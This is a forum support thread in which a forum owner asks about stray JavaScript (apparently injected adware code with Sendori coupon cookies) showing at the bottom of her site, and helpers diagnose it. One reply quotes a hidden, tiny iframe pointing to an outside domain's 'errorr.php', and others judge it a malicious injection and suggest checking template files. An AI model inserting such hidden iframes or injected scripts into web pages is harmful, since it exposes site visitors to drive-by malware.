Help! I have some random code on my forum...

[Divine27]

I have this code on the bottom of my forum, it popped up sometime today when I wasn't online cause it wasn't there yesterday. What does all this mean and how do I fix it? :/

Code Select Expand

")}if(t=="NX"){i="G";for(var n=0;n=0){i=slider_keywords.slidertext[n].FAVICONSRC}}}l(t,e.ads[0].title,e.ads[0].description,displayURL,clickURL,i)}else if(t=="NX"&&r!=undefined&&r=="Y"){c()}}})}function b(){var e="Your input '"+OriginalDomain+"' has been corrected to '"+CorrectedDomain+"'";var t="";var n=e.length>63?63:e.length;for(i=0;i0){$jOld.cookie("sendori_coupon",1,{expires:expirationDate,path:"/",domain:cookieDomain});var couponDisplay=1}else{var couponDisplay=1}}else{couponCount=parseInt($jOld.cookie("sendori_coupon"));if(couponCount0){createCookie("sendori_coupon",1,couponCookieExpire);var couponDisplay=1}else{var couponDisplay=1}}else{couponCount=parseInt(readCookie("sendori_coupon"));if(couponCount

[Burke ♞ Knight]

Have any mods been installed lately?
A link to the site would be useful.


Are you using the latest version of SMF?
Are you using a custom theme?
Any errors in the error logs? Apache, PHP, SMF?

[Divine27]

My forum is 2.0.5
I am using a custom theme from dzinerstudio, but it's been its been working fine since I got it.
Link is here: http://divinecandice.com/forum [nofollow]
And the only mod I did install was peoplesign or whatever, but uninstalled it when I got online, because the question verification seems to be working to keep the spam accounts away. And the error was already there when I did the uninstall, cause that's what I thought it was as first too, a broken mod of somesort.

[Burke ♞ Knight]

I'm not seeing what you posted, but I do say that the text on your site is very difficult to read, the way the colors are.

Also, there does appear to be something at the bottom, that does not show much, except a little something at the very left.
I am unable to detect what it is, or how it fits in.

[Divine27]

ok, thank you very much.

[anir]

You have probably added this ?> somewhere near the bottom in some html code which lead to your code display.

[Kindred]

Given the contents of the code, it looks like a badly added advert code..

[Divine27]

I haven't added anything to the code though. :/ I contact my host to see if they can check it out.

[busterone]

I found this in your source code

Code Select Expand

<iframe src="hfbakhsh.com/logs/errorr.php" border="0" height="5" width="6"></body></html></iframe>
That doesn't appear to be part of your domain and smells of something sinister. I haven't tried to access that file, because I am not going to get myself infected just in case. 

[margarett]

According Godaddy's Whois:

Domain Name: HFBAKHSH.COM
Registrar URL: http://www.godaddy.com
Updated Date: 2013-07-16 10:05:14
Creation Date: 2013-07-16 10:05:14
Registrar Expiration Date: 2015-07-16 10:05:14
Registrar: GoDaddy.com, LLC
Domain Status: clientDeleteProhibited
Domain Status: clientRenewProhibited
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Registrant Name: Ed Safrini
Registrant Organization:
Registrant Street:
Registrant City:
Registrant State/Province: Ontario
Registrant Postal Code:
Registrant Country: Canada

So it can be anyone, basically

[Kindred]

googling it does indicate that some people have complained about a malicious injection...

Which indicates that there may be something bad about that....
(the domain itself appears to be about insulated panels...   but I am betting that they themselves were hacked, and that this errorr.php file is a payload.


You're going to need to check your files for other stray code.

index.php and index.template.php are the most common targets, but there could be stuff stuck in all over.

look for recent file edits.

and googling the original code snippet that you psted indicates that there appear to be a lot of sites which have this snippet displayed....  which suggests a real hack pointing to a badly formed page - this exposing the hack by accident.